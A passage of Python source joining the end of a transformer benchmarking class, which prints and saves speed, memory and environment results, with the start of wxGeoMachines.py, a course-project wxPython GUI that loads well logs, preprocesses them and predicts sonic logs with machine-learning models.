for c, model_name in enumerate(self.args.model_names):
self.print_fn(f"{c + 1} / {len(self.args.model_names)}")
model_dict = {
"bs": self.args.batch_sizes,
"ss": self.args.sequence_lengths,
"result": {i: {} for i in self.args.batch_sizes},
}
inference_result_time[model_name] = copy.deepcopy(model_dict)
inference_result_memory[model_name] = copy.deepcopy(model_dict)
train_result_time[model_name] = copy.deepcopy(model_dict)
train_result_memory[model_name] = copy.deepcopy(model_dict)
inference_summary = train_summary = None
for batch_size in self.args.batch_sizes:
for sequence_length in self.args.sequence_lengths:
if self.args.inference:
if self.args.memory:
memory, inference_summary = self.inference_memory(model_name, batch_size, sequence_length)
inference_result_memory[model_name]["result"][batch_size][sequence_length] = memory
if self.args.speed:
time = self.inference_speed(model_name, batch_size, sequence_length)
inference_result_time[model_name]["result"][batch_size][sequence_length] = time
if self.args.training:
if self.args.memory:
memory, train_summary = self.train_memory(model_name, batch_size, sequence_length)
train_result_memory[model_name]["result"][batch_size][sequence_length] = memory
if self.args.speed:
time = self.train_speed(model_name, batch_size, sequence_length)
train_result_time[model_name]["result"][batch_size][sequence_length] = time
if self.args.inference:
if self.args.speed:
self.print_fn("\n" + 20 * "=" + ("INFERENCE - SPEED - RESULT").center(40) + 20 * "=")
self.print_results(inference_result_time, type_label="Time in s")
self.save_to_csv(inference_result_time, self.args.inference_time_csv_file)
if self.args.is_tpu:
self.print_fn(
"TPU was used for inference. Note that the time after compilation stabilized (after ~10 inferences model.forward(..) calls) was measured."
)
if self.args.memory:
self.print_fn("\n" + 20 * "=" + ("INFERENCE - MEMORY - RESULT").center(40) + 20 * "=")
self.print_results(inference_result_memory, type_label="Memory in MB")
self.save_to_csv(inference_result_memory, self.args.inference_memory_csv_file)
if self.args.trace_memory_line_by_line:
self.print_fn("\n" + 20 * "=" + ("INFERENCE - MEMOMRY - LINE BY LINE - SUMMARY").center(40) + 20 * "=")
self.print_memory_trace_statistics(inference_summary)
if self.args.training:
if self.args.speed:
self.print_fn("\n" + 20 * "=" + ("TRAIN - SPEED - RESULTS").center(40) + 20 * "=")
self.print_results(train_result_time, "Time in s")
self.save_to_csv(train_result_time, self.args.train_time_csv_file)
if self.args.is_tpu:
self.print_fn(
"TPU was used for training. Note that the time after compilation stabilized (after ~10 train loss=model.forward(...) + loss.backward() calls) was measured."
)
if self.args.memory:
self.print_fn("\n" + 20 * "=" + ("TRAIN - MEMORY - RESULTS").center(40) + 20 * "=")
self.print_results(train_result_memory, type_label="Memory in MB")
self.save_to_csv(train_result_memory, self.args.train_memory_csv_file)
if self.args.trace_memory_line_by_line:
self.print_fn("\n" + 20 * "=" + ("TRAIN - MEMOMRY - LINE BY LINE - SUMMARY").center(40) + 20 * "=")
self.print_memory_trace_statistics(train_summary)
if self.args.env_print:
self.print_fn("\n" + 20 * "=" + ("ENVIRONMENT INFORMATION").center(40) + 20 * "=")
self.print_fn(
"\n".join(["- {}: {}".format(prop, val) for prop, val in self.environment_info.items()]) + "\n"
)
if self.args.save_to_csv:
with open(self.args.env_info_csv_file, mode="w", newline="") as csv_file:
writer = csv.writer(csv_file)
for key, value in self.environment_info.items():
writer.writerow([key, value])
return BenchmarkOutput(
inference_result_time,
inference_result_memory,
train_result_time,
train_result_memory,
inference_summary,
train_summary,
)
@property
def environment_info(self):
if self._environment_info is None:
info = {}
info["transformers_version"] = version
info["framework"] = self.framework
if self.framework == "PyTorch":
info["use_torchscript"] = self.args.torchscript
if self.framework == "TensorFlow":
info["eager_mode"] = self.args.eager_mode
info["use_xla"] = self.args.use_xla
info["framework_version"] = self.framework_version
info["python_version"] = platform.python_version()
info["system"] = platform.system()
info["cpu"] = platform.processor()
info["architecture"] = platform.architecture()[0]
info["date"] = datetime.date(datetime.now())
info["time"] = datetime.time(datetime.now())
info["fp16"] = self.args.fp16
info["use_multiprocessing"] = self.args.do_multi_processing
info["only_pretrain_model"] = self.args.only_pretrain_model
if is_psutil_available():
info["cpu_ram_mb"] = bytes_to_mega_bytes(psutil.virtual_memory().total)
else:
logger.warning(
"Psutil not installed, we won't log available CPU memory."
"Install psutil (pip install psutil) to log available CPU memory."
)
info["cpu_ram_mb"] = "N/A"
info["use_gpu"] = self.args.is_gpu
if self.args.is_gpu:
info["num_gpus"] = 1 # TODO(PVP) Currently only single GPU is supported
if is_py3nvml_available():
nvml.nvmlInit()
handle = nvml.nvmlDeviceGetHandleByIndex(self.args.device_idx)
info["gpu"] = nvml.nvmlDeviceGetName(handle)
info["gpu_ram_mb"] = bytes_to_mega_bytes(nvml.nvmlDeviceGetMemoryInfo(handle).total)
info["gpu_power_watts"] = nvml.nvmlDeviceGetPowerManagementLimit(handle) / 1000
info["gpu_performance_state"] = nvml.nvmlDeviceGetPerformanceState(handle)
nvml.nvmlShutdown()
else:
logger.warning(
"py3nvml not installed, we won't log GPU memory usage. "
"Install py3nvml (pip install py3nvml) to log information about GPU."
)
info["gpu"] = "N/A"
info["gpu_ram_mb"] = "N/A"
info["gpu_power_watts"] = "N/A"
info["gpu_performance_state"] = "N/A"
info["use_tpu"] = self.args.is_tpu
# TODO(PVP): See if we can add more information about TPU
# see: https://github.com/pytorch/xla/issues/2180
self._environment_info = info
return self._environment_info
def print_results(self, result_dict, type_label):
self.print_fn(80 * "-")
self.print_fn(
"Model Name".center(30) + "Batch Size".center(15) + "Seq Length".center(15) + type_label.center(15)
)
self.print_fn(80 * "-")
for model_name in self.args.model_names:
for batch_size in result_dict[model_name]["bs"]:
for sequence_length in result_dict[model_name]["ss"]:
result = result_dict[model_name]["result"][batch_size][sequence_length]
if isinstance(result, float):
result = round(1000 * result) / 1000
result = "< 0.001" if result == 0.0 else str(result)
else:
result = str(result)
self.print_fn(
model_name[:30].center(30) + str(batch_size).center(15),
str(sequence_length).center(15),
result.center(15),
)
self.print_fn(80 * "-")
def print_memory_trace_statistics(self, summary: MemorySummary):
self.print_fn(
"\nLine by line memory consumption:\n"
+ "\n".join(
f"{state.frame.filename}:{state.frame.line_number}: mem {state.cpu_gpu}: {state.frame.line_text}"
for state in summary.sequential
)
)
self.print_fn(
"\nLines with top memory consumption:\n"
+ "\n".join(
f"=> {state.frame.filename}:{state.frame.line_number}: mem {state.cpu_gpu}: {state.frame.line_text}"
for state in summary.cumulative[:6]
)
)
self.print_fn(
"\nLines with lowest memory consumption:\n"
+ "\n".join(
f"=> {state.frame.filename}:{state.frame.line_number}: mem {state.cpu_gpu}: {state.frame.line_text}"
for state in summary.cumulative[-6:]
)
)
self.print_fn(f"\nTotal memory increase: {summary.total}")
def save_to_csv(self, result_dict, filename):
if not self.args.save_to_csv:
return
self.print_fn("Saving results to csv.")
with open(filename, mode="w") as csv_file:
assert len(self.args.model_names) > 0, "At least 1 model should be defined, but got {}".format(
self.model_names
)
fieldnames = ["model", "batch_size", "sequence_length"]
writer = csv.DictWriter(csv_file, fieldnames=fieldnames + ["result"])
writer.writeheader()
for model_name in self.args.model_names:
result_dict_model = result_dict[model_name]["result"]
for bs in result_dict_model:
for ss in result_dict_model[bs]:
result_model = result_dict_model[bs][ss]
writer.writerow(
{
"model": model_name,
"batch_size": bs,
"sequence_length": ss,
"result": ("{}" if not isinstance(result_model, float) else "{:.4f}").format(
result_model
),
}
)
|
wxGeoMachines.py | #!/usr/bin/env pythonw
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2019 maxvelasques
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
print('Loading python moduli...')
import sys
import os
import multiprocessing
try:
print('Setting multiprocessing method to spawn...', end=" ")
multiprocessing.set_start_method('spawn')
print('Done')
except:
print('Spawn multiprocessing method has already been set.')
try:
from matplotlib import cm
from matplotlib import colorbar
from matplotlib import colors
from matplotlib import figure
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas
from matplotlib.backends.backend_wxagg import NavigationToolbar2WxAgg as NavigationToolbar
import matplotlib.pyplot as plt
except:
print('matplotlib not available.')
exit(0)
try:
import numpy as np
except:
print('numpy not available.')
exit(0)
try:
import pandas as pd
except:
print('pandas not available.')
exit(0)
try:
import scipy.optimize as optimize
import scipy.signal as signal
except:
print('scipy not available.')
exit(0)
try:
import csv
except:
print('csv not available.')
exit(0)
try:
import lasio
except:
print('lasio not available.')
exit(0)
try:
from sklearn import cluster
from sklearn.preprocessing import StandardScaler
except:
print('Sklearn not available. Install sklearn before generating logs')
try:
import wx
import wx.lib.agw.aui as aui
import wx.lib.mixins.inspection as wit
import wx.adv
except:
print('wxPython not available.')
exit(0)
from mutil import ReadLAS
from mutil import ReadASC
from mutil import WriteLAS
from mutil import ReadCoords
from mutil import emptyplotLog
from mutil import plotLogs
from mutil import PrepareStringStatus
from mutil import PrepareStringError
from mutil import concatenate_pandas
from mutil import split_pandas
from mutil import dicts_are_equal
from mutil import ffnn_predict
from mutil import random_forest_predict
from mutil import gardner_predict
from mCrossPlot import CrossPlotFrame
from mBaseMap import BaseMapFrame
##############################################################################
# DRAW MAIN WINDOW;
##############################################################################
class mainFrame(wx.Frame):
def __init__(self, *args, **kwargs):
super(mainFrame, self).__init__(*args, **kwargs)
self.InitUI()
self.welllogs = {}
self.welllogs_pre = {}
self.welllogs_ffnn = {}
self.welllogs_ffnn_error = {}
self.welllogs_random_forest = {}
self.welllogs_random_forest_error = {}
self.welllogs_gardner = {}
self.welllogs_gardner_error = {}
self.preprocessing_pars = {}
def InitUI(self):
# Setting up the menu.
datamenu = wx.Menu()
self.Bind(wx.EVT_MENU, self.OnImport, datamenu.Append(101, "Import well", "Import"))
self.Bind(wx.EVT_MENU, self.OnBaseMap, datamenu.Append(102, "Generate Base Map", "Base Map"))
self.Bind(wx.EVT_MENU, self.OnExport, datamenu.Append(103, "Export well", "Export"))
self.Bind(wx.EVT_MENU, self.OnAbout, datamenu.Append(wx.ID_ABOUT, "About GeoMachines", "About"))
# datamenu.Append(wx.ID_ABOUT, "About","About")
datamenu.Append(wx.ID_EXIT,"Exit","Close")
preprosmenu = wx.Menu()
self.Bind(wx.EVT_MENU, self.OnExportFlow,preprosmenu.Append(201, "Export workflow", "Export workflow"))
self.Bind(wx.EVT_MENU, self.OnImportFlow,preprosmenu.Append(202, "Import and Apply workflow", "Import and Apply workflow"))
# Creating the menubar.
menuBar = wx.MenuBar()
menuBar.Append(datamenu, "Data")
menuBar.Append(preprosmenu,"Pre-Processing")
self.SetMenuBar(menuBar) # Adding the MenuBar to the Frame content.
self.SetTitle('GeoMachines')
self.Centre()
#CREATE A SPLITTER
splitter = wx.SplitterWindow(self)
self.BasicControls = BasicControls(splitter,self) ##LEFT SIDE
self.plotter = PlotNotebook(splitter) #RIGHT SIDE
splitter.SplitVertically(self.BasicControls, self.plotter)
splitter.SetMinimumPaneSize(200)
splitter.SetSashPosition(200)
fig,axes = self.plotter.add('empty')
emptyplotLog(fig,axes)
def OnAbout(self, event):
aboutInfo = wx.adv.AboutDialogInfo()
aboutInfo.SetName("GeoMachines")
aboutInfo.SetVersion("1.0")
aboutInfo.SetDescription("""
Final project of CSCI-470 Machine Learning course at Colorado School
of Mines. Developed by GeoMachines group, this application is
capable of generating sonic logs using Machine Learning methods.
""")
aboutInfo.SetCopyright("(C) 2019-2019")
aboutInfo.SetWebSite("https://github.com/maxvelasques/wxGeoMachines")
aboutInfo.AddDeveloper("Max Velasques\nAndrea Damasceno\nAtilas Silva\nSamuel Chambers\nMeng Jia")
wx.adv.AboutBox(aboutInfo)
return
def OnImport(self, e):
dialog = wx.FileDialog(self,message="Select well logs",wildcard="LAS files (*.LAS; *.ASC)|*.las;*.LAS;*.asc;*.ASC",style=wx.FD_OPEN | wx.FD_MULTIPLE)
if dialog.ShowModal() == wx.ID_CANCEL:
return 0;
progressdialog = wx.ProgressDialog('Progress dialog', message='Loading data...')
filenames = dialog.GetFilenames()
directory = dialog.GetDirectory()
n_itens = len(filenames)
i=1
for filename in filenames:
progressdialog.Update(int(100*i/n_itens))
i+=1
fullpath = os.path.join(directory,filename)
if os.path.splitext(filename)[1] == '.LAS':
print('\nReading LAS: "' + filename + '" ...')
welllog = ReadLAS(fullpath)
self.welllogs[filename] = welllog
# self.welllogs_pre[filename] = welllog.copy()
print(welllog.columns)
fig,axes = self.plotter.add(filename)
fig.gca()
plotLogs(filename,fig,axes ,welllog)
elif os.path.splitext(filename)[1] == '.ASC':
print('\nReading ASC: "' + filename + '" ...')
welllog = ReadASC(fullpath)
self.welllogs[filename] = welllog
# self.welllogs_pre[filename] = welllog.copy()
print(welllog.columns)
fig,axes = self.plotter.add(filename)
fig.gca()
plotLogs(filename,fig,axes ,welllog)
progressdialog.Close()
def OnExport(self, e):
original_filename = self.plotter.nb.GetPageText(self.plotter.nb.GetSelection())
if original_filename == 'empty':
return wx.MessageBox('No file available.', "Warning", wx.OK | wx.ICON_WARNING)
with wx.FileDialog(self,message="Save current well log",wildcard="LAS files (*.LAS)|*.LAS",style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT) as dialog:
if dialog.ShowModal() != wx.ID_CANCEL:
fullpath = dialog.GetPath()
if os.path.exists(fullpath):
print('Deleting "' + fullpath + '"...')
os.remove(fullpath)
if original_filename in self.welllogs_pre:
well_log = self.welllogs_pre[original_filename]
else:
well_log = self.welllogs[original_filename]
well_log = well_log.copy()
if original_filename in self.welllogs_ffnn:
well_log_ffnn = self.welllogs_ffnn[original_filename]
well_log['DT'] = well_log_ffnn['DT']
WriteLAS(fullpath,well_log)
# well_log.to_csv(fullpath + ".csv")
return wx.MessageBox('LAS file exported successfully.', "Export LAS file", wx.OK | wx.ICON_INFORMATION)
def OnBaseMap(self, e):
dialog = wx.FileDialog(self,message="Select well coordinates",wildcard="XLSX files (*.XLS*)|*.xlsx;*.xls;*.XLSX;*.XLS",style=wx.FD_OPEN)
if dialog.ShowModal() == wx.ID_CANCEL:
return 0;
coords_in = ReadCoords(dialog.GetPath())
columns_names = list(coords_in.columns)
coords_out = pd.DataFrame(columns=columns_names)
for j in range(self.plotter.nb.GetPageCount()):
filename = self.plotter.nb.GetPageText(j)
if filename in coords_in.Filename.values:
coords_out = coords_out.append(coords_in[coords_in.Filename == filename])
frame = BaseMapFrame(self,coords_out,self.welllogs)
frame.Show()
def OnCrossPlot(self, e):
dialog = wx.ProgressDialog('Progress dialog', message='Generating cross plot...')
filename = self.plotter.nb.GetPageText(self.plotter.nb.GetSelection())
title = self.BasicControls.QCPanel.choice.GetString(self.BasicControls.QCPanel.choice.GetCurrentSelection())
if title == 'Current well - Original':
frame = CrossPlotFrame(self,title,filename,self.welllogs, dialog, alllogs = False)
elif title == 'Current well - Pre-processed':
frame = CrossPlotFrame(self,title,filename,self.welllogs_pre, dialog, alllogs = False)
elif title == 'All wells - Original':
frame = CrossPlotFrame(self,title,filename,self.welllogs, dialog, alllogs = True)
elif title == 'All wells - Pre-processed':
frame = CrossPlotFrame(self,title,filename,self.welllogs_pre,dialog, alllogs = True)
dialog.Close()
frame.Show()
def PreProcess(self,filename, welllogs, current_preprocessing_pars,progressdialog,alllogs=False):
filter_size = current_preprocessing_pars['filter_size']
cut = current_preprocessing_pars['cut']
if alllogs:
n_itens = len(welllogs.keys())
i = 1
for key in welllogs.keys():
progressdialog.Update(10+int(30*i/n_itens))
i+=1
well_tmp = welllogs[key].copy()
#CUT THE BEGINING OF THE CURRENT WELLLOG
if current_preprocessing_pars['cut_check']:
print(' Cutting log...')
mindepth = well_tmp.DEPT.min()
well_tmp = well_tmp[ well_tmp.DEPT > (mindepth + cut) ]
#DESPIKE
if current_preprocessing_pars['filter_check']:
print(' Despiking log...')
well_tmp.GR = signal.medfilt(well_tmp['GR'].values,filter_size)
well_tmp.RHOB = signal.medfilt(well_tmp['RHOB'].values,filter_size)
well_tmp.NPHI = signal.medfilt(well_tmp['NPHI'].values,filter_size)
well_tmp.DT = signal.medfilt(well_tmp['DT'].values,filter_size)
well_tmp.RESI = signal.medfilt(well_tmp['RESI'].values,filter_size)
welllogs[key] = well_tmp
#DBSCAN
progressdialog.Update(50)
print('All wells')
if current_preprocessing_pars['dbscan_check']:
print(' Applying DBSCAN...')
##############################################################
merged_welllogs = concatenate_pandas(welllogs)
rhob_dt_scaled = StandardScaler().fit_transform(merged_welllogs[['RHOB','DT']].values)
progressdialog.Update(60)
XX = cluster.DBSCAN(eps=current_preprocessing_pars['dbscan_eps'], min_samples=current_preprocessing_pars['dbscan_minneigh']).fit(rhob_dt_scaled)
y_pred = XX.labels_
y_pred = y_pred.astype(float)
y_pred[y_pred == (-1)] = np.nan
merged_welllogs['outliers'] = y_pred
merged_welllogs = merged_welllogs.dropna()
merged_welllogs = merged_welllogs.drop(columns=['outliers'])
welllogs = split_pandas(merged_welllogs)
##############################################################
else:
progressdialog.Update(30)
well_tmp = welllogs[filename].copy()
#CUT THE BEGINING OF THE CURRENT WELLLOG
print(filename)
if current_preprocessing_pars['cut_check']:
print(' Cutting log...')
mindepth = well_tmp.DEPT.min()
well_tmp = well_tmp[ well_tmp.DEPT > (mindepth + cut) ]
progressdialog.Update(50)
#DESPIKE
if current_preprocessing_pars['filter_check']:
print(' Despiking log...')
well_tmp.GR = signal.medfilt(well_tmp.GR.values,filter_size)
well_tmp.RHOB = signal.medfilt(well_tmp.RHOB.values,filter_size)
well_tmp.NPHI = signal.medfilt(well_tmp.NPHI.values,filter_size)
well_tmp.DT = signal.medfilt(well_tmp.DT.values,filter_size)
well_tmp.RESI = signal.medfilt(well_tmp.RESI.values,filter_size)
progressdialog.Update(80)
#DBSCAN
if current_preprocessing_pars['dbscan_check']:
print(' Applying DBSCAN...')
##############################################################
rhob_dt_scaled = StandardScaler().fit_transform(well_tmp[['RHOB','DT']].values)
XX = cluster.DBSCAN(eps=current_preprocessing_pars['dbscan_eps'], min_samples=current_preprocessing_pars['dbscan_minneigh']).fit(rhob_dt_scaled)
y_pred = XX.labels_
y_pred = y_pred.astype(float)
#y_pred[y_pred != (-1)] = (0)
y_pred[y_pred == (-1)] = np.nan
well_tmp['outliers'] = y_pred
well_tmp = well_tmp.dropna()
##############################################################
welllogs[filename] = well_tmp
return welllogs
def OnPrePross(self, e):
dialog = wx.ProgressDialog('Progress dialog', message='Processing data...')
filename = self.plotter.nb.GetPageText(self.plotter.nb.GetSelection())
title = self.BasicControls.PreProsPanel.choice.GetString(self.BasicControls.PreProsPanel.choice.GetCurrentSelection())
cut_check = int(self.BasicControls.PreProsPanel.checkbox_cut.IsChecked())
cut = self.BasicControls.PreProsPanel.spinctrl_cut.GetValue()
dbscan_check = int(self.BasicControls.PreProsPanel.checkbox_dbscan.IsChecked())
dbscan_eps = self.BasicControls.PreProsPanel.spinctrl_eps.GetValue()
dbscan_minneigh = self.BasicControls.PreProsPanel.spinctrl_minneigh.GetValue()
filter_check = int(self.BasicControls.PreProsPanel.checkbox_median.IsChecked())
filter_size = self.BasicControls.PreProsPanel.spinctrl_median.GetValue()
if filter_size%2 == 0:
filter_size+=1
current_preprocessing_pars = {'cut_check': cut_check,
'cut':cut,
'dbscan_check':dbscan_check,
'dbscan_eps':dbscan_eps,
'dbscan_minneigh':dbscan_minneigh,
'filter_check':filter_check,
'filter_size':filter_size
}
preparamstr = PrepareStringStatus(current_preprocessing_pars)
last_selection = self.plotter.nb.GetSelection()
dialog.Update(10)
if title == 'Current well - Original':
self.welllogs_pre[filename] = self.welllogs[filename]
self.preprocessing_pars[filename] = current_preprocessing_pars
self.welllogs_pre = self.PreProcess(filename, self.welllogs_pre.copy(), self.preprocessing_pars[filename],dialog,alllogs=False)
fig,axes = self.plotter.update(filename,self.plotter.nb.GetSelection())
fig.gca()
plotLogs(filename,fig,axes ,self.welllogs[filename],self.welllogs_pre[filename],paramstr=preparamstr)
self.plotter.RefreshPlot(self.plotter.nb.GetSelection())
elif title == 'All wells - Original':
self.welllogs_pre = self.PreProcess(filename, self.welllogs.copy(), current_preprocessing_pars,dialog,alllogs=True)
n_pages = self.plotter.nb.GetPageCount()
filenames = []
for i in range(n_pages):
filenames.append(self.plotter.nb.GetPageText(i))
dialog.Update(60)
j = 1
for i in reversed(range(n_pages)):
dialog.Update(60+int(30*j/n_pages))
j+=1
filename = filenames[i]
fig,axes = self.plotter.update(filename,i)
fig.gca()
plotLogs(filename,fig,axes ,self.welllogs[filename],self.welllogs_pre[filename],paramstr=preparamstr)
self.plotter.RefreshPlot(i)
self.preprocessing_pars[filename] = current_preprocessing_pars
self.plotter.nb.SetSelection(last_selection)
dialog.Update(100)
dialog.Close()
def OnImportFlow(self, e):
dialog = wx.FileDialog(self,message="Import workflow",wildcard="Flow files (*.flow)|*.flow",style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST)
if dialog.ShowModal() != wx.ID_CANCEL:
progressdialog = wx.ProgressDialog('Progress dialog', message='Processing data...')
fullpath = dialog.GetPath()
readCSV = csv.reader(open(fullpath, "r"))
for row in readCSV:
filename = row[0]
row.remove(filename)
current_preprocessing_pars = {}
for key, value in zip(row[::2],row[1::2]):
try:
current_preprocessing_pars[key] = int(value)
except ValueError:
current_preprocessing_pars[key] = float(value)
n_pages = self.plotter.nb.GetPageCount()
filenames = []
for j in range(n_pages):
filenames.append(self.plotter.nb.GetPageText(j))
for j in range(n_pages):
if filename == filenames[j]:
self.welllogs_pre[filename] = self.welllogs[filename]
self.preprocessing_pars[filename] = current_preprocessing_pars
break
j = 0
alllogs = True
filename = ''
for key in self.preprocessing_pars.keys():
if j == 0:
reference_par = self.preprocessing_pars[key]
filename = key
j+=1
else:
if dicts_are_equal(reference_par,self.preprocessing_pars[key]) == False:
alllogs = False
break
if alllogs:
self.welllogs_pre = self.PreProcess(filename, self.welllogs_pre.copy(), self.preprocessing_pars[filename],progressdialog,alllogs=True)
for j in range(n_pages):
filename = self.plotter.nb.GetPageText(j)
preparamstr = PrepareStringStatus(self.preprocessing_pars[filename])
#UPDATE
if alllogs == False:
self.welllogs_pre = self.PreProcess(filename, self.welllogs_pre.copy(), self.preprocessing_pars[filename],progressdialog,alllogs=False)
fig,axes = self.plotter.update(filename,j)
fig.gca()
plotLogs(filename,fig,axes ,self.welllogs[filename],self.welllogs_pre[filename],paramstr=preparamstr)
self.plotter.RefreshPlot(j)
progressdialog.Update(100)
progressdialog.Close()
# return wx.MessageBox('Pre-processing workflow imported successfully.', "Import workflow", wx.OK | wx.ICON_INFORMATION)
def OnExportFlow(self, e):
dialog = wx.FileDialog(self,message="Export workflow",wildcard="Flow files (*.flow)|*.flow",style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
if dialog.ShowModal() != wx.ID_CANCEL:
fullpath = dialog.GetPath()
w = csv.writer(open(fullpath, "w"))
for key, vals in self.preprocessing_pars.items():
row = []
row.append(key)
for subkey,subval in vals.items():
row.append(subkey)
row.append(subval)
w.writerow(row)
return wx.MessageBox('Pre-processing workflow exported successfully.', "Export workflow", wx.OK | wx.ICON_INFORMATION)
def OnPredictLog(self, e):
filename = self.plotter.nb.GetPageText(self.plotter.nb.GetSelection())
if filename in self.welllogs:
progressdialog = wx.ProgressDialog('Progress dialog', message='Predicting sonic log...')
progressdialog.Update(20)
title = self.BasicControls.MLPanel.choicewells.GetString(self.BasicControls.MLPanel.choicewells.GetCurrentSelection())
model_name = self.BasicControls.MLPanel.choicemodel.GetString(self.BasicControls.MLPanel.choicemodel.GetCurrentSelection())
welllog_orig = self.welllogs[filename]
welllog_pre = None
welllog_ffnn = None
welllog_ffnn_error = 0.0
welllog_random_forest = None
welllog_random_forest_error = 0.0
welllog_gardner = None
welllog_gardner_error = 0.0
preparamstr = ""
errorstr = ""
preprocessed = False
if title == 'Current well - Pre-processed':
if filename in self.welllogs_pre:
welllog_pre = self.welllogs_pre[filename]
preprocessed = True
else:
progressdialog.Update(100)
progressdialog.Close()
return wx.MessageBox('There is no pre-processed log for this well.', "Warning", wx.OK | wx.ICON_WARNING)
preparamstr = PrepareStringStatus(self.preprocessing_pars[filename])
if filename in self.welllogs_gardner:
welllog_gardner = self.welllogs_gardner[filename]
welllog_gardner_error = self.welllogs_gardner_error[filename]
if filename in self.welllogs_ffnn:
welllog_ffnn = self.welllogs_ffnn[filename]
welllog_ffnn_error = self.welllogs_ffnn_error[filename]
if filename in self.welllogs_random_forest:
welllog_random_forest = self.welllogs_random_forest[filename]
welllog_random_forest_error = self.welllogs_random_forest_error[filename]
if 'FFNN' in model_name:
progressdialog.Update(50)
queue = multiprocessing.Queue()
if preprocessed:
p1 = multiprocessing.Process(target=ffnn_predict, args=(queue,welllog_pre,))
else:
p1 = multiprocessing.Process(target=ffnn_predict, args=(queue,welllog_orig,))
p1.start()
result = queue.get()
p1.join()
welllog_ffnn = result['log']
welllog_ffnn_error = result['error']
self.welllogs_ffnn[filename] = welllog_ffnn
self.welllogs_ffnn_error[filename] = welllog_ffnn_error
progressdialog.Update(80)
elif 'Random Forest' in model_name:
progressdialog.Update(50)
if preprocessed:
welllog_random_forest,welllog_random_forest_error = random_forest_predict(welllog_pre)
else:
welllog_random_forest,welllog_random_forest_error = random_forest_predict(welllog_orig)
self.welllogs_random_forest[filename] = welllog_random_forest
self.welllogs_random_forest_error[filename] = welllog_random_forest_error
progressdialog.Update(80)
elif 'Gardner' in model_name:
progressdialog.Update(50)
if preprocessed:
welllog_gardner,welllog_gardner_error = gardner_predict(welllog_pre)
else:
welllog_gardner,welllog_gardner_error = gardner_predict(welllog_orig)
self.welllogs_gardner[filename] = welllog_gardner
self.welllogs_gardner_error[filename] = welllog_gardner_error
progressdialog.Update(80)
else:
progressdialog.Update(100)
progressdialog.Close()
return wx.MessageBox('The selected model is not available.', "Warning", wx.OK | wx.ICON_WARNING)
errorstr = PrepareStringError(welllog_ffnn_error,welllog_random_forest_error,welllog_gardner_error)
fig,axes = self.plotter.update(filename,self.plotter.nb.GetSelection())
fig.gca()
plotLogs(filename,fig,axes ,welllog_orig, welllog_pre=welllog_pre, welllog_ffnn=welllog_ffnn,welllog_random_forest=welllog_random_forest,welllog_gardner=welllog_gardner,paramstr=preparamstr,errorstr=errorstr)
self.plotter.RefreshPlot(self.plotter.nb.GetSelection())
progressdialog.Update(100)
progressdialog.Close()
return
##############################################################################
# MAIN PANEL - RIGHT
##############################################################################
class Plot(wx.Panel):
def __init__(self, parent, id=-1, dpi=None, **kwargs):
wx.Panel.__init__(self, parent, id=id, **kwargs)
self.figure = figure.Figure(dpi=dpi, figsize=(20, 20))
self.axes = []
subplots = 6
for i in range(1,subplots+1):
if i == 1:
self.axes.append(self.figure.add_subplot(1,subplots,i))
else:
self.axes.append(self.figure.add_subplot(1,subplots,i,sharey=self.axes[0]))
self.canvas = FigureCanvas(self, -1, self.figure)
self.toolbar = NavigationToolbar(self.canvas)
self.toolbar.Realize()
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(self.canvas , 1, wx.EXPAND)
sizer.Add(self.toolbar , 0, wx.LEFT | wx.EXPAND)
self.SetSizer(sizer)
def clear(self):
self.figure.clf()
self.axes = []
subplots = 6
for i in range(1,subplots+1):
if i == 1:
self.axes.append(self.figure.add_subplot(1,subplots,i))
else:
self.axes.append(self.figure.add_subplot(1,subplots,i,sharey=self.axes[0]))
class PlotNotebook(wx.Panel):
def __init__(self, parent, id=-1):
wx.Panel.__init__(self, parent, id=id)
self.parent = parent
self.nb = aui.AuiNotebook(self)
sizer = wx.BoxSizer()
sizer.Add(self.nb, 1, wx.EXPAND)
self.SetSizer(sizer)
def add(self, name="plot"):
page = Plot(self.nb)
if self.nb.GetPageCount() > 0:
if self.nb.GetPageText(0) == 'empty':
self.nb.DeletePage(0)
self.nb.AddPage(page, name)
return page.figure,page.axes
def update(self, name,page_number):
page = self.nb.GetPage(page_number)
page.clear()
# self.nb.DeletePage(page_number)
# page = Plot(self.nb)
# self.nb.InsertPage(page_number, page, name)
return page.figure,page.axes
def RefreshPlot(self,page_number):
page = self.nb.GetPage(page_number)
page.canvas.draw()
##############################################################################
# LATERAL BAR - LEFT
##############################################################################
class BasicControls(wx.Panel):
def __init__(self, parent, mainframe, id=-1):
wx.Panel.__init__(self, parent, id=id)
self.parent = parent
font = wx.SystemSettings.GetFont(wx.SYS_SYSTEM_FONT)
font.SetPointSize(9)
#CREATE CONTROLS SUBPANELS
vbox = wx.BoxSizer(wx.VERTICAL)
vbox1 = wx.BoxSizer(wx.HORIZONTAL)
vbox1.Add(ImportPanel(self,mainframe), flag=wx.EXPAND, border=2)
vbox.Add(vbox1, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=2)
vbox.Add((-1, 7))
vbox2 = wx.BoxSizer(wx.HORIZONTAL)
self.QCPanel = QCPanel(self,mainframe)
vbox2.Add(self.QCPanel, flag=wx.EXPAND, border=2)
vbox.Add(vbox2, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=2)
vbox.Add((-1, 7))
vbox3 = wx.BoxSizer(wx.HORIZONTAL)
